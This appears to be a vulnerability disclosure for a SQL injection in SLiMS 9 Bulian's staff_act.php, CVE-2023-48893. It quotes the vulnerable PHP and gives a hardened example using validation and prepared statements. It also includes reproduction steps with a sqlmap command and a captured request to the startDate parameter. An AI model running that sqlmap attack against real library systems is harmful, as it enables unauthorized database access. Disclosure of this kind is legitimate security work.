CVE-2023-48893: Vuln0wned Report: SQL Injection in staff_act.php · Issue #209 · slims/slims9_bulian

Senayan Library Management Systems SLIMS 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/staff_act.php.


The Bug

A SQL injection exists in admin/modules/reporting/customs/staff_act.php in the code below:

// create datagrid
$reportgrid = new report_datagrid();
$reportgrid->setSQLColumn('u.realname AS \''.__('Real Name').'\'',
    'u.username AS \''.__('Login Username').'\'',
    'u.user_id AS \''.__('Bibliography Data Entry').'\'',
    'u.user_id AS \''.__('Item Data Entry').'\'',
    'u.user_id AS \''.__('Member Data Entry').'\'',
    'u.user_id AS \''.__('Loans').'\'',
    'u.user_id AS \''.__('Returns').'\'',
    'u.user_id AS \''.__('Extends').'\'');
$reportgrid->setSQLorder('realname ASC');

// is there any search
$criteria = 'user_id IS NOT NULL ';
$reportgrid->setSQLCriteria($criteria);

$start_date = '2000-01-01';
if (isset($_GET['startDate'])) {
    $start_date = $_GET['startDate']; // unsanitized input 1
}
$until_date = date('Y-m-d');
if (isset($_GET['untilDate'])) {
    $until_date = $_GET['untilDate']; // unsanitized input 2
}
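The two `$_GET` values above reach the report's SQL criteria as raw strings, which is what sqlmap exploits in the reproduction steps. The block below is an added example written for this page, not code from SLiMS or from the reporter: it shows the same two parameters handled with strict date validation and a prepared statement. It assumes a mysqli connection in `$dbs` built with placeholder credentials, a `user` table with a DATE column named `input_date` (the page does not show how the dates enter the query, so the column name is an assumption), and a direct prepared statement in place of the `report_datagrid` class, whose parameter-binding support is not shown here.

```php
<?php
// Added example, not SLiMS code: hardened handling of startDate/untilDate.
declare(strict_types=1);

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Assumed connection; SLiMS keeps its own handle, credentials here are placeholders.
$dbs = new mysqli('localhost', 'slims_user', 'change-me', 'slims');
$dbs->set_charset('utf8mb4');

/**
 * Return $value if it is a real calendar date in YYYY-MM-DD form, else $default.
 * \z (not $) is used so a trailing newline cannot slip past the anchor, and
 * checkdate() rejects impossible dates such as 2023-02-30 that match the pattern.
 */
function validDateOrDefault(?string $value, string $default): string
{
    if ($value === null || !preg_match('/^(\d{4})-(\d{2})-(\d{2})\z/', $value, $m)) {
        return $default;
    }
    if (!checkdate((int) $m[2], (int) $m[3], (int) $m[1])) {
        return $default;
    }
    return $value;
}

// Same defaults as the original file; anything that is not a date falls back to them.
$start_date = validDateOrDefault($_GET['startDate'] ?? null, '2000-01-01');
$until_date = validDateOrDefault($_GET['untilDate'] ?? null, date('Y-m-d'));

// Even validated values are bound, never concatenated into the criteria string.
// `u.input_date` is an assumed column name for the date the report filters on.
$sql = 'SELECT u.realname, u.username, u.user_id FROM user AS u '
     . 'WHERE u.user_id IS NOT NULL AND u.input_date BETWEEN ? AND ? '
     . 'ORDER BY u.realname ASC';

$stmt = $dbs->prepare($sql);
$stmt->bind_param('ss', $start_date, $until_date);
$stmt->execute();

$result = $stmt->get_result(); // requires mysqlnd, the default driver in modern PHP
while ($row = $result->fetch_assoc()) {
    // Escape on output as well, since realname is user-controlled data.
    echo htmlspecialchars($row['realname'], ENT_QUOTES, 'UTF-8'), "\n";
}
$stmt->close();
```

Validation and binding are both kept on purpose: the prepared statement alone stops the injection, while the date check keeps a malformed value from silently turning into an empty or wrong report and gives the caller a fixed default instead.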

To Reproduce
Steps to reproduce the behavior:

  1. Log in as admin or as a user that has access to Staff Activity Reporting

  2. Make sure Burp is on to capture the request, as below

  3. Save the request into a file (example.req)

  4. Run the test with sqlmap using the command

    sqlmap command:
    sqlmap -r example.req --level 5 --risk 3 -p startDate --random-agent --dbms=mysql --current-user
    
  5. It’s in

example.req

GET /slims9_bulian-9.6.1/admin/modules/reporting/customs/staff_act.php?startDate=2000-01-01&untilDate=2023-08-2&applyFilter=Apply+Filter&reportView=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=reporting
Cookie: SenayanAdmin=68n7ojemg853g6ipos463oo2o2; admin_logged_in=1; SenayanMember=nva8k0bovrr32qckn46cs9u46h
Upgrade-Insecure-Requests: 1

Screenshots

proof-of-concept current user

Versions

  • OS: Windows
  • Browser: Firefox | 116.0.3 (64-bit)
  • Slims Version: slims9_bulian-9.6.1

Notes
